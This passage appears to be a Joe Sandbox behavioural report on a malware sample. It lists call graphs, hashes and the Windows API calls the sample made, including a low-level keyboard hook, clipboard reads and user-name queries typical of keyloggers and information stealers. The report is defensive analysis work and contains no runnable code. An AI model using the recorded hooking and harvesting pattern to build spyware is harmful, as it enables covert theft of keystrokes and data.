38336->38263 38337->38335 38337->38336 38339 73e2113 38338->38339 38340 73e8b61 38339->38340 38342 73e8b51 38339->38342 38343 73e8b5f 38340->38343 38377 73e78ac 38340->38377 38342->38343 38365 73e8d7d 38342->38365 38371 73e8d90 38342->38371 38350 73e9286 38346->38350 38347 73eb6b8 38347->38315 38348 73ec289 KiUserCallbackDispatcher 38349 73ec2b6 38348->38349 38349->38315 38350->38347 38350->38348 38355 73e9286 38351->38355 38352 73ec289 KiUserCallbackDispatcher 38353 73ec2b6 38352->38353 38353->38315 38354 73eb6b8 38354->38315 38355->38352 38355->38354 38360 73e9286 38356->38360 38357 73eb6b8 38357->38315 38358 73ec289 KiUserCallbackDispatcher 38359 73ec2b6 38358->38359 38359->38315 38360->38357 38360->38358 38362 73ed390 OleGetClipboard 38361->38362 38364 73ed42a 38362->38364 38367 73e8d9e 38365->38367 38366 73e78ac 2 API calls 38366->38367 38367->38366 38368 73e8e76 38367->38368 38384 73ec2e8 38367->38384 38388 73ec2d8 38367->38388 38368->38343 38372 73e8d9e 38371->38372 38373 73e78ac 2 API calls 38372->38373 38374 73e8e76 38372->38374 38375 73ec2e8 OleGetClipboard 38372->38375 38376 73ec2d8 OleGetClipboard 38372->38376 38373->38372 38374->38343 38375->38372 38376->38372 38378 73e78b7 38377->38378 38379 73e8f7c 38378->38379 38380 73e8ed2 38378->38380 38382 73e2108 OleGetClipboard 38379->38382 38381 73e8f2a CallWindowProcW 38380->38381 38383 73e8ed9 38380->38383 38381->38383 38382->38383 38383->38343 38385 73ec307 38384->38385 38386 73ec445 38385->38386 38393 73ec84f 38385->38393 38386->38367 38389 73ec2c7 38388->38389 38390 73ec2e2 38388->38390 38389->38367 38391 73ec445 38390->38391 38392 73ec84f OleGetClipboard 38390->38392 38391->38367 38392->38390 38395 73ec853 38393->38395 38394 73ec8fc 38394->38385 38395->38394 38399 73ec928 38395->38399 38413 73ec919 38395->38413 38396 73ec911 38396->38385 38400 73ec93a 38399->38400 38401 73ec955 38400->38401 38403 73ec999 38400->38403 38411 73ec928 OleGetClipboard 38401->38411 38412 73ec919 OleGetClipboard 38401->38412 38402 73ec95b 38402->38396 38404 73ecf9d OleGetClipboard 38403->38404 38405 73ec9de 38404->38405 38407 73eca19 38405->38407 38408 73ecf9d OleGetClipboard 38405->38408 38409 73ecef7 OleGetClipboard 38405->38409 38410 73ecfd0 OleGetClipboard 38405->38410 38406 73eca37 38406->38396 38407->38396 38408->38406 38409->38406 38410->38406 38411->38402 38412->38402 38414 73ec91e 38413->38414 38415 73ec955 38414->38415 38416 73ec999 38414->38416 38422 73ec928 OleGetClipboard 38415->38422 38423 73ec919 OleGetClipboard 38415->38423 38418 73ecf9d OleGetClipboard 38416->38418 38417 73ec95b 38417->38396 38419 73ec9de 38418->38419 38421 73eca19 38419->38421 38424 73ecf9d OleGetClipboard 38419->38424 38425 73ecef7 OleGetClipboard 38419->38425 38426 73ecfd0 OleGetClipboard 38419->38426 38420 73eca37 38420->38396 38421->38396 38422->38417 38423->38417 38424->38420 38425->38420 38426->38420 38454 73ecb00 38455 73ecb0b 38454->38455 38456 73ecb1b 38455->38456 38458 73e7b1c 38455->38458 38459 73ecbe0 OleInitialize 38458->38459 38460 73ecc44 38459->38460 38460->38456 38461 18e5ad0 38462 18e5aec 38461->38462 38465 18e4954 38462->38465 38464 18e5b25 38467 18e75f0 LoadLibraryA 38465->38467 38468 18e76e9 38467->38468 38469 18ef6d0 38472 18ef731 GetUserNameW 38469->38472 38471 18ef81d 38472->38471 38473 16ed030 38474 16ed048 38473->38474 38475 16ed0a2 38474->38475 38476 73e2108 2 API calls 38474->38476 38477 73e5dd8 7 API calls 38474->38477 38479 73e5dc5 7 API calls 38474->38479 38481 73e5ef0 7 API calls 38474->38481 38482 73e6111 7 API calls 38474->38482 38483 73e8af2 38474->38483 38491 73e6159 38474->38491 38476->38475 38477->38475 38479->38475 38481->38475 38482->38475 38486 73e8b2d 38483->38486 38484 73e8b61 38485 73e78ac 2 API calls 38484->38485 38487 73e8b5f 38484->38487 38485->38487 38486->38484 38488 73e8b51 38486->38488 38488->38487 38489 73e8d7d 2 API calls 38488->38489 38490 73e8d90 2 API calls 38488->38490 38489->38487 38490->38487 38492 73e618e 38491->38492 38493 73e2108 2 API calls 38492->38493 38494 73e61af 38493->38494 38494->38475

                                                                                  Executed Functions

                                                                                  Function 073E9260 Relevance: 4.3, APIs: 1, Instructions: 2808COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,073E9235), ref: 073EC2A7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: e7cb056b3e43ed84066eb77b9bfa026ef847dd42e9920199a8f7db95ef771283
                                                                                  • Instruction ID: e1e0c4414cbd464d3bb703dc95a137f3ed07f480e67c133262eb9581b8e2b93c
                                                                                  • Opcode Fuzzy Hash: e7cb056b3e43ed84066eb77b9bfa026ef847dd42e9920199a8f7db95ef771283
                                                                                  • Instruction Fuzzy Hash: 8463E571D10B5A8ADB11EF68C884A99F7B1FF99300F11D79AE45877221EB70AAC4CF41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 018EF6D0 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 640 18ef6d0-18ef72f 641 18ef79a-18ef79e 640->641 642 18ef731-18ef75c 640->642 643 18ef7c9-18ef7d4 641->643 644 18ef7a0-18ef7c3 641->644 651 18ef75e-18ef760 642->651 652 18ef78c 642->652 645 18ef7d6-18ef7de 643->645 646 18ef7e0-18ef81b GetUserNameW 643->646 644->643 645->646 649 18ef81d-18ef823 646->649 650 18ef824-18ef83a 646->650 649->650 653 18ef83c-18ef848 650->653 654 18ef850-18ef877 650->654 656 18ef782-18ef78a 651->656 657 18ef762-18ef76c 651->657 655 18ef791-18ef794 652->655 653->654 665 18ef879-18ef87d 654->665 666 18ef887 654->666 655->641 656->655 661 18ef76e 657->661 662 18ef770-18ef77e 657->662 661->662 662->662 663 18ef780 662->663 663->656 665->666 667 18ef87f 665->667 668 18ef888 666->668 667->666 668->668
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 018EF80B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.526443376.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_18e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: 6c8be0a592720f510c7cecd965c9cfe7708c20b506e3cefaed13ea888f7e42e4
                                                                                  • Instruction ID: 3874156f6977cfadb5f49f7ccb0e6d6b57be990aa586ea6949b7cbc8bcb593f9
                                                                                  • Opcode Fuzzy Hash: 6c8be0a592720f510c7cecd965c9cfe7708c20b506e3cefaed13ea888f7e42e4
                                                                                  • Instruction Fuzzy Hash: 06512474D002688FDB14CFA9C888B9DFBF1BF49314F148119E915AB394DB749944CF95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06FC01F8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06FC18F0,00000000,00000000), ref: 06FC20C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.581540887.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_6fc0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: 0fcf0f21db99c894a4a897f585dc083d34abe1494ed672c53363a82ef2883dbe
                                                                                  • Instruction ID: 130847e8c3bbabd9edbb02ca51520820f7107a6eeb953d9ad6f0003b21e72626
                                                                                  • Opcode Fuzzy Hash: 0fcf0f21db99c894a4a897f585dc083d34abe1494ed672c53363a82ef2883dbe
                                                                                  • Instruction Fuzzy Hash: 282118B5D002099FCB54CF9AC944BEEFBF5EF88324F14841AE415A7250CB75A945CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073E4008 Relevance: 1.8, APIs: 1, Instructions: 295COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 506 73e4008-73e402e 509 73e405e-73e4066 506->509 510 73e4030-73e4058 call 73e1f68 call 73e1fe4 506->510 511 73e40ac-73e40f5 call 73e1ffc 509->511 512 73e4068-73e406d call 73e1ff0 509->512 510->509 520 73e4273-73e4299 510->520 534 73e40fb-73e4146 511->534 535 73e42a0-73e42d2 511->535 517 73e4072-73e40a7 512->517 527 73e4149-73e41ab call 73e1f68 call 73e2008 517->527 520->535 556 73e4267-73e4272 527->556 557 73e41b1-73e41be 527->557 534->527 549 73e42d9-73e4380 535->549 564 73e4388-73e43b3 GetModuleHandleW 549->564 565 73e4382-73e4385 549->565 560 73e41c4-73e41f1 call 73e1f68 call 73e1ffc 557->560 561 73e4263-73e4265 557->561 560->561 575 73e41f3-73e4200 560->575 561->549 561->556 567 73e43bc-73e43d0 564->567 568 73e43b5-73e43bb 564->568 565->564 568->567 575->561 576 73e4202-73e4219 call 73e1f68 call 73e2014 575->576 581 73e421b-73e4224 call 73e2008 576->581 582 73e4226-73e4255 call 73e2008 576->582 581->561 582->561 590 73e4257-73e4261 582->590 590->561 590->582
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: d54e0533e7f1026117a5c36a4342309cbad08cf16f21c96015d0f89d4a1bf049
                                                                                  • Instruction ID: 68ef0e2ffb18baed5d4ba47dd617a491c2c8eb49cb31de7360148dfbd5710618
                                                                                  • Opcode Fuzzy Hash: d54e0533e7f1026117a5c36a4342309cbad08cf16f21c96015d0f89d4a1bf049
                                                                                  • Instruction Fuzzy Hash: 2FB18DB4A007598FDB14DFA9C89466EBBF6FF88210B00892ED44AD7791DB34E905CBD1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073E5310 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 592 73e5310-73e5324 593 73e535e-73e53d6 592->593 594 73e5326-73e534d 592->594 597 73e53d8-73e53de 593->597 598 73e53e1-73e53e8 593->598 595 73e5355-73e5356 594->595 596 73e5350 call 73e205c 594->596 596->595 597->598 599 73e53ea-73e53f0 598->599 600 73e53f3-73e5492 CreateWindowExW 598->600 599->600 602 73e549b-73e54d3 600->602 603 73e5494-73e549a 600->603 607 73e54d5-73e54d8 602->607 608 73e54e0 602->608 603->602 607->608 609 73e54e1 608->609 609->609
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 073E5482
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 81f2de4327b2ed47403bf31b4995dd27bf4ac367a5cad7135cc473a1d71d4a0d
                                                                                  • Instruction ID: 92366576a545e1fbb8796740754af82e38ed7fc693d3ddccfe7c9aef95ec6360
                                                                                  • Opcode Fuzzy Hash: 81f2de4327b2ed47403bf31b4995dd27bf4ac367a5cad7135cc473a1d71d4a0d
                                                                                  • Instruction Fuzzy Hash: 6A510FB6C00259EFDF11CF99C980ACDBFB6BF48314F25816AE818AB260D7759855CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 018EF6C4 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 610 18ef6c4-18ef72f 612 18ef79a-18ef79e 610->612 613 18ef731-18ef75c 610->613 614 18ef7c9-18ef7d4 612->614 615 18ef7a0-18ef7c3 612->615 622 18ef75e-18ef760 613->622 623 18ef78c 613->623 616 18ef7d6-18ef7de 614->616 617 18ef7e0-18ef81b GetUserNameW 614->617 615->614 616->617 620 18ef81d-18ef823 617->620 621 18ef824-18ef83a 617->621 620->621 624 18ef83c-18ef848 621->624 625 18ef850-18ef877 621->625 627 18ef782-18ef78a 622->627 628 18ef762-18ef76c 622->628 626 18ef791-18ef794 623->626 624->625 636 18ef879-18ef87d 625->636 637 18ef887 625->637 626->612 627->626 632 18ef76e 628->632 633 18ef770-18ef77e 628->633 632->633 633->633 634 18ef780 633->634 634->627 636->637 638 18ef87f 636->638 639 18ef888 637->639 638->637 639->639
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 018EF80B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.526443376.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_18e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: b9e7a2cbf9f3ef242b3fdcf3fec32a14df4abf70cb00230df615ceb7dbd0665b
                                                                                  • Instruction ID: f0637be2ef0e779c197a942c642ac78b5874e9c1603a37706b8578fd0545e3f6
                                                                                  • Opcode Fuzzy Hash: b9e7a2cbf9f3ef242b3fdcf3fec32a14df4abf70cb00230df615ceb7dbd0665b
                                                                                  • Instruction Fuzzy Hash: 5E5133B4D002288FDB18CFA9C888B9DFBF1BF49314F148029E919AB394D7749944CF95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073E205C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 669 73e205c-73e53d6 671 73e53d8-73e53de 669->671 672 73e53e1-73e53e8 669->672 671->672 673 73e53ea-73e53f0 672->673 674 73e53f3-73e5492 CreateWindowExW 672->674 673->674 676 73e549b-73e54d3 674->676 677 73e5494-73e549a 674->677 681 73e54d5-73e54d8 676->681 682 73e54e0 676->682 677->676 681->682 683 73e54e1 682->683 683->683
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 073E5482
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 5801e4695f7f34934a966682a8b71176b5b1791f15f952a7acf492f3fe757329
                                                                                  • Instruction ID: 0196c03963c3193b0d2fefc90d3900f430fb19fdfb5688b8789498dce2ce12fc
                                                                                  • Opcode Fuzzy Hash: 5801e4695f7f34934a966682a8b71176b5b1791f15f952a7acf492f3fe757329
                                                                                  • Instruction Fuzzy Hash: 1D51D0B5D10319AFDB14CF99C884ADEFBB6BF48314F24812AE819AB250D7759885CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073ECB50 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 684 73ecb50-73ecb55 685 73ecb57-73ecb5a 684->685 686 73ecb7c-73ecb7f 685->686 687 73ecb5c-73ecb61 685->687 688 73ecbaf-73ecbb1 686->688 689 73ecb81-73ecb87 686->689 688->685 690 73ecbb3-73ecbb8 688->690 691 73ecb89-73ecb8e 689->691 692 73ecb62-73ecb69 689->692 690->685 691->688 693 73ecbbf-73ecbc7 692->693 694 73ecb6b-73ecb74 692->694 695 73ecb76-73ecb7b 694->695 696 73ecb90-73ecb96 694->696 697 73ecbc8-73ecbdf 696->697 698 73ecb98-73ecba7 696->698 702 73ecbe0-73ecc42 OleInitialize 697->702 699 73ecbba-73ecbbd 698->699 700 73ecba9-73ecbae 698->700 699->693 699->694 703 73ecc4b-73ecc68 702->703 704 73ecc44-73ecc4a 702->704 704->703
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 789dcee87842d7a9bb272dc1c65f73fa431532304da4dee8082061a2be853be6
                                                                                  • Instruction ID: d7520c4a16b93c21d691e61ebe1a82723df200bb3126ca59e7f95521e5afc35c
                                                                                  • Opcode Fuzzy Hash: 789dcee87842d7a9bb272dc1c65f73fa431532304da4dee8082061a2be853be6
                                                                                  • Instruction Fuzzy Hash: 4C31E5B6A002258FDB10DB9DD4447DEFBF9EB84324F14886AD09CE7640C335E8868BE0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073E78AC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 727 73e78ac-73e8ecc 730 73e8f7c-73e8f9c call 73e2108 727->730 731 73e8ed2-73e8ed7 727->731 738 73e8f9f-73e8fac 730->738 732 73e8f2a-73e8f62 CallWindowProcW 731->732 733 73e8ed9-73e8f10 731->733 736 73e8f6b-73e8f7a 732->736 737 73e8f64-73e8f6a 732->737 741 73e8f19-73e8f28 733->741 742 73e8f12-73e8f18 733->742 736->738 737->736 741->738 742->741
                                                                                  APIs
                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 073E8F51
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallProcWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2714655100-0
                                                                                  • Opcode ID: a1ffa1b854c5fe4a7a47bd4404b6017130769faac1449758b2fc42cc66686275
                                                                                  • Instruction ID: d0d51c437dfe2c7e987d56f068ff649bca765a04abcbec81da7a2d6bce6c65c3
                                                                                  • Opcode Fuzzy Hash: a1ffa1b854c5fe4a7a47bd4404b6017130769faac1449758b2fc42cc66686275
                                                                                  • Instruction Fuzzy Hash: 2A413DB8D10215DFDB10CF99C488A9ABBFAFF88314F24C859E519A7351D774A941CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 018E4954 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 707 18e4954-18e7647 709 18e769b-18e76e7 LoadLibraryA 707->709 710 18e7649-18e766e 707->710 713 18e76e9-18e76ef 709->713 714 18e76f0-18e7721 709->714 710->709 715 18e7670-18e7672 710->715 713->714 722 18e7723-18e7727 714->722 723 18e7731 714->723 716 18e7674-18e767e 715->716 717 18e7695-18e7698 715->717 719 18e7682-18e7691 716->719 720 18e7680 716->720 717->709 719->719 724 18e7693 719->724 720->719 722->723 725 18e7729 722->725 726 18e7732 723->726 724->717 725->723 726->726
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 018E76D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.526443376.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_18e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 4b2914951164790b8118c08ac9a016ea0b789a2fb318d4be79a2dc1f1ba7543a
                                                                                  • Instruction ID: 8bcf516810bbc834de51c09dfbf5746f3dfc6d6e791d1c2300761e934ccf1880
                                                                                  • Opcode Fuzzy Hash: 4b2914951164790b8118c08ac9a016ea0b789a2fb318d4be79a2dc1f1ba7543a
                                                                                  • Instruction Fuzzy Hash: 5E4136B0D006199FDB10CFADC88879EBBF2EB49318F148129E815EB390D77499468F91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 018E75E5 Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 744 18e75e5-18e7647 745 18e769b-18e76e7 LoadLibraryA 744->745 746 18e7649-18e766e 744->746 749 18e76e9-18e76ef 745->749 750 18e76f0-18e7721 745->750 746->745 751 18e7670-18e7672 746->751 749->750 758 18e7723-18e7727 750->758 759 18e7731 750->759 752 18e7674-18e767e 751->752 753 18e7695-18e7698 751->753 755 18e7682-18e7691 752->755 756 18e7680 752->756 753->745 755->755 760 18e7693 755->760 756->755 758->759 761 18e7729 758->761 762 18e7732 759->762 760->753 761->759 762->762
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 018E76D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.526443376.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_18e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: d56b59c465ccf12e6e1243da235c9a559329d39bcba1cf53a897208d310afabf
                                                                                  • Instruction ID: 596250b401ada09bb8163056361d779aa1648fdf1e39a011992ce8f1913db76a
                                                                                  • Opcode Fuzzy Hash: d56b59c465ccf12e6e1243da235c9a559329d39bcba1cf53a897208d310afabf
                                                                                  • Instruction Fuzzy Hash: 104167B4D102199FDB10CFADC98879DBBF2AB48318F148529E805EB380D7789942CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073EC628 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1384 73ec628-73ed428 OleGetClipboard 1387 73ed42a-73ed430 1384->1387 1388 73ed431-73ed47f 1384->1388 1387->1388 1393 73ed48f 1388->1393 1394 73ed481-73ed485 1388->1394 1396 73ed490 1393->1396 1394->1393 1395 73ed487 1394->1395 1395->1393 1396->1396
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard
                                                                                  • String ID:
                                                                                  • API String ID: 220874293-0
                                                                                  • Opcode ID: 4e989adef8798ae90db64e3d5906cc82e9351648edca811fd5da889b76786c22
                                                                                  • Instruction ID: f9c100af883c420a6e47478ae686c3818ceb77daa47225aad5b8b2dad49e51bd
                                                                                  • Opcode Fuzzy Hash: 4e989adef8798ae90db64e3d5906cc82e9351648edca811fd5da889b76786c22
                                                                                  • Instruction Fuzzy Hash: EA3123B0E10229EFDB10CF99C884BDEBBF5AB08314F248059E408BB390DBB46945CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073ED384 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1397 73ed384-73ed3e0 1399 73ed3ea-73ed428 OleGetClipboard 1397->1399 1400 73ed42a-73ed430 1399->1400 1401 73ed431-73ed47f 1399->1401 1400->1401 1406 73ed48f 1401->1406 1407 73ed481-73ed485 1401->1407 1409 73ed490 1406->1409 1407->1406 1408 73ed487 1407->1408 1408->1406 1409->1409
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard
                                                                                  • String ID:
                                                                                  • API String ID: 220874293-0
                                                                                  • Opcode ID: 9fdaffded9c84ad754a02bef374352dd74c9ea96cfb3dac47a0406e926b21054
                                                                                  • Instruction ID: 52d33d53f3aed4cc1fe7ea7db3671d98dcb98708a3376d75f3c55b2238e08a28
                                                                                  • Opcode Fuzzy Hash: 9fdaffded9c84ad754a02bef374352dd74c9ea96cfb3dac47a0406e926b21054
                                                                                  • Instruction Fuzzy Hash: 853114B4E10219EFDB10CF99C884BDDBBF5AB48314F248059E008BB394DB746945CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073E76DC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1410 73e76dc-73e7df4 DuplicateHandle 1412 73e7dfd-73e7e1a 1410->1412 1413 73e7df6-73e7dfc 1410->1413 1413->1412
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,073E7D26,?,?,?,?,?), ref: 073E7DE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: b68b41527b46456ffc155e1b29f2009356bc8a30d641c92e20522a5fe0b4a6f4
                                                                                  • Instruction ID: d01263d172e89bfcd3a5f60206a26b41ba374e19c1d0836ec2043a6529dfa934
                                                                                  • Opcode Fuzzy Hash: b68b41527b46456ffc155e1b29f2009356bc8a30d641c92e20522a5fe0b4a6f4
                                                                                  • Instruction Fuzzy Hash: E8210AB5D002199FDB10CF99D984ADEBBF9EB48310F14841AE814A3350C374A944CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 073E7D5A Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1416 73e7d5a-73e7d5f 1417 73e7d60-73e7df4 DuplicateHandle 1416->1417 1418 73e7dfd-73e7e1a 1417->1418 1419 73e7df6-73e7dfc 1417->1419 1419->1418
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,073E7D26,?,?,?,?,?), ref: 073E7DE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
